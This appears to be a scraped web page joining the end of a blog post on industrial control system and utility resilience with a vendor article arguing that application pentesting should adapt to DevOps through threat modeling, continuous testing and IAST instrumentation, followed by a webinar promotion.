We are reliant on the use of outdated systems that are not prepared for certain disaster scenarios. For an industrial control system to experience downtime, it does not require an adversary to compromise a system. Look at what happened with the Texas winter storm. No one expected the weather to get that bad, but we could have better prepped our systems for it.

That is the challenge with utilities and industrial control systems. If you are not preparing for adversaries in tandem with natural disasters and other unforeseen circumstances, you could have major issues to deal with in the long run.

Another key factor to consider is time. When something goes wrong, coming up with the easiest, least expensive, and most feasible solution isn’t possible because of time constraints. And with water, heat, electricity, energy, or gas companies the pressure of time is mounting because they are critical part of our lives. Say your furnace in your home breaks when it is below freezing out. You typically have two options: have someone come out and evaluate the situation, wait weeks for the part, and fix the existing furnace or buy a new one and have it installed in days. To avoid frozen pipes and infrastructure issues, most would choose the fastest option. In a recent study, those who did not test their disaster recovery plan cited time and resources as the biggest barriers.

At utility facilities, there remains a lack of awareness around cyber security. Regular tabletop exercises that simulate a crisis scenario are necessary when working with systems this complex.

The three key learnings discussed in this blog should work in concert with one another. Use the findings from your holistic security assessment and dust off your disaster recovery and incident response plans to remediate your biggest security and safety gaps – and, in turn, strengthen your defense in depth.

Back

Introducing Interactive Pentesting: Human Experts Augmented With IAST

In 2008, Brian Chess declared the impending death of application penetration testing. He believed that pentesting, as everyone knew it back then, was in its final days – about to die and come back as something else. He likened it to the ubiquitous personal digital assistants (PDAs) of the early 2000s – disappearing in form, while the key functions were reborn in modern smartphones.

Pentesting Remains Alive and Well

But more than 12 years since Chess predicted the imminent demise of pentesting, it continues to thrive in almost exactly the same form as before. This is because penetration testing examines a target environment as a whole – looking into complex or fundamental vulnerabilities that scan-based tools cannot find, such as business logic flaws, poor separation of duties, or ineffective network segmentation. Pentesting can offer tangible ROI in terms of breach prevention, compliance reporting, and ongoing security metrics.

The objective of pentesting is to simulate attacks on network infrastructure and applications in order to test defenses and find vulnerabilities.

  • Network penetration testing targets network and host configurations to verify patches and other vulnerability checks.
  • Application penetration testing focuses on testing custom applications, such as web applications, application programming interfaces (APIs), and rich-client applications.

With application pentesting in particular, a typical engagement involves a small team that spends a week or two focused on a specific application. Because of the long delays and natural bottlenecks associated with the process, organizations generally save these tests for the end of the software development life cycle (SDLC).

Feeding the Need for DevOps Speed

In the early 2000s, pentesting traditional monolithic web applications was relatively easy. Anyone with a proxy and the OWASP Testing Guide could find a wide range of issues. However, since that “golden age” of pentesting, software development has accelerated dramatically.

An astounding 92.7 billion lines of code were written in 2020 alone. Today’s software applications have become much larger, more complex, more interconnected, and far more critical to the individuals and organizations that use them. The majority (79%) of DevOps teams report that they are under increasing pressure to shorten release cycles – and 80% of teams deploy code to production at least multiple times per week. Indeed, modern development pipelines are designed to deliver software not in days or even hours – but in minutes.

How Can Pentesting Keep Up With Today’s Development Cycles?

1. Start with threat modeling

Traditional pentesting efforts are often poorly prioritized and directed. Rather than focusing on finding the most critical risks, they simply use a checklist or a specific set of tools. For modern applications in particular, threat modeling can help drive testing priorities by identifying key security and privacy concerns. The Threat Modeling Manifesto is a great place to get started.

2. Partner with development

Effective testing requires detailed information about how the application works and the ability to leverage the quality-test infrastructure to generate and modify application traffic. The fastest way for application security to do this is to partner with the development team. Here, pentesters should strive to work with developers to understand an application’s unique complexities without compromising their independence.

3. Stop competing with tools

Pentesting should be part of a “balanced breakfast” of testing techniques. Do not waste precious pentesting hours on things that have been already thoroughly tested with other techniques, such as interactive application security testing (IAST). Focus manual testing efforts on the specific areas where other application security tools are weak, like authentication, access control, and use of encryption. Track your route coverage to make sure you have thoroughly tested all the applications or API attack surface.

4. Embrace continuous testing

DevOps and Agile workflows have been widely embraced to accelerate release cycles and the amount of new code being written. Modern SDLC pipelines often deploy code to production many times each day. There is simply no way to perform traditional penetration tests before release without disrupting workflows and severely slowing down the SDLC. To reduce the time between deployment and testing, organizations must consider more scalable approaches that can run continuously.

5. Adapt to modern application complexity (APIs, microservices, serverless)

Today’s cloud-native applications can be difficult to test. Authentication schemes are complex and rapid request rates make interception difficult. For example, APIs do not just use HTTP with simple payloads. They also use things like JSON, XML, and serialized objects. And API security has become particularly important – specifically, APIs serve as gateways into an enterprise (making them popular targets for bad actors). Further, as modern pentesting requires tools that generate attack traffic across all the distributed parts of the application, it may take time to understand these communications and gain comprehensive visibility.

6. Understand open-source libraries and frameworks

Similarly, there is complexity on the server side. The vast majority of applications (94%) rely on open-source components, each with an average of nearly 700 dependencies that present potential vulnerabilities. For example, the newly discovered dependency confusion attack can leverage an open-source ecosystem flaw to upload malware to repositories, which then get automatically distributed downstream into internal applications. To address these sorts of issues, a pentesting team must quickly understand the application framework, how it routes to code, and how built-in security defenses are supposed to work.

7. Leverage instrumentation

Organizations can dramatically accelerate penetration testing by getting visibility into exactly what happens inside the application code or API when an attack is sent. Security instrumentation tools (like IAST) are very effective at tracking things like data flows, control flows, backend connections, and configuration files. Application security teams should install an agent before starting pentesting, which can then provide an inside view of all actual vulnerabilities present in the code during the application runtime. This visibility can dramatically accelerate penetration testing coverage and accuracy.

8. Deliver security test cases

Communicating with development teams and other groups that need to know about security is tough. Rather than delivering a traditional PDF report with arcane findings, application security teams should consider using Jira tickets to make their recommendations easier to consume. Even better, application security teams can deliver findings as test cases that run continuously with every build to prevent future instances of each discovered vulnerability from ever reoccurring. Security that natively integrates with ticketing systems can have an even broader impact – helping to improve the accuracy of testing, incentivize the remediation, and accelerate development cycles – all while helping to deliver secure code to production.

The Evolution of Penetration Testing

Ideally, the goal of modern pentesting should be to figure out new application technologies and how to test them for vulnerabilities. Penetration testing teams should be the advance guard for SDLC – driving the state of the art in security forward. But there simply are not enough skilled individual application security researchers to perform penetration testing on everything. So, we must continuously take the manual test approaches designed by penetration testers and support them with automation.

That said, unlike premature prognostications a decade ago, penetration testing is not on its deathbed. In one form or another, it will always be a valuable part of application security. And as applications continue to expand and grow more complex, security must evolve pentesting for each new layer that is added.

For more details on next-generation pentesting, make sure to register for the upcoming webinar – “How to Streamline AppSec with Interactive Pentesting.”

How to Streamline AppSec with Interactive Pentesting

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X